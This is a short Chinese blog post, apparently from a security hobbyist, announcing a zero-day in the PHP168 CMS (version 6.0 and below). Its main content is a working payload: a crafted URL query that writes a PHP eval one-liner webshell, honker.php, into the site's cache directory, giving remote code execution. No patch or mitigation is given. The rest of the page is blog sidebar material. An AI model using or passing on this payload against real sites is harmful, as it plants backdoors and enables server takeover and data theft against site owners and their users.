PHP168 6.0及以下版本0day
影响版本:PHP168 6.0以下版本
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。
测试语句:
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?
相关文章
评论 (0)
Trackbacks (0)
发表评论
Trackback
About Me
姓名:Chinadu
性别:Man
职业:网络安全从业者
E-mail:imcto#msn.cn
最近文章
标签
热门文章
- 松岛枫、武藤兰电影全集 BT 下载 - 31,145 views
- 佳木斯列车长楚春娇视频事件 - 9,459 views
- Wildpackets OmniPeek 5.1 完整汉化版 - 6,796 views
- BT4 pre Final下spoonwep2和spoonwpa整合方法 - 6,570 views
- chinajoy露毛照 - 3,995 views
- BackTrack 3 (BT3)中文版,可显示中文文件及文件夹(二) - 3,063 views
- BT4 pre final配置网络(上网设置) - 2,461 views
- 最简单的U盘启动BT3的方法 - 2,404 views
- 玫瑰小镇老虎花种子领取方法 - 1,955 views
- 制作可保存配置的U盘版BT4(BackTrack4 ) - 1,920 views
我的微博
Blogroll
- Any_Feel Blog
- Char`s Blog
- DoDo`s Blog
- Exists`s Blog
- iCNPunk`s Blog
- Kevinick`s Blog
- Mars-X `s blog
- polprav`s Blog
- PR9`s Blog
- Ritto`s Blog
- Saitojie`s Blog
- shiwolf`s Blog
- wjs`s Blog
- X1ao.Zhe`s Blog
- YanYun's blog
- 丑丑的避难所
- 二少`s Blog
- 信拓科技
- 假装纯情`s Blog
- 凌风's BloG
- 凡客
- 大地`s Blog
- 小美`s Blog
- 开源镜像-搜狐
- 开源镜像-网易
- 残の泪's Blog
- 沙漠之鹰
- 牛在飞`s Blog
- 迅雷 快车 旋风地址在线转换器
- 阿杰`s Blog
- 风平浪静`s Blog
- 骨头`s Blog
- 鸿鸿'blog
- 黑客榜中榜
Archives
- 2010年七月
- 2010年六月
- 2010年五月
- 2010年四月
- 2010年三月
- 2010年二月
- 2010年一月
- 2009年十二月
- 2009年十一月
- 2009年十月
- 2009年九月
- 2009年八月
- 2009年七月
- 2009年六月
- 2009年五月
- 2009年四月
- 2009年三月
- 2009年二月
- 2009年一月
- 2008年十二月
- 2008年十一月
- 2008年十月
- 2008年九月
- 2008年八月
- 2008年七月
- 2008年六月
- 2008年五月
- 2008年三月
- 2008年一月
- 2007年十二月
- 2007年十一月
- 2007年十月
- 2007年九月
- 2007年八月
- 2007年七月
- 2007年六月
- 2007年五月
- 2007年四月
- 2007年三月
- 2007年二月
- 2007年一月
- 2006年十二月
- 2006年十一月
- 2006年十月
- 2006年九月
最近评论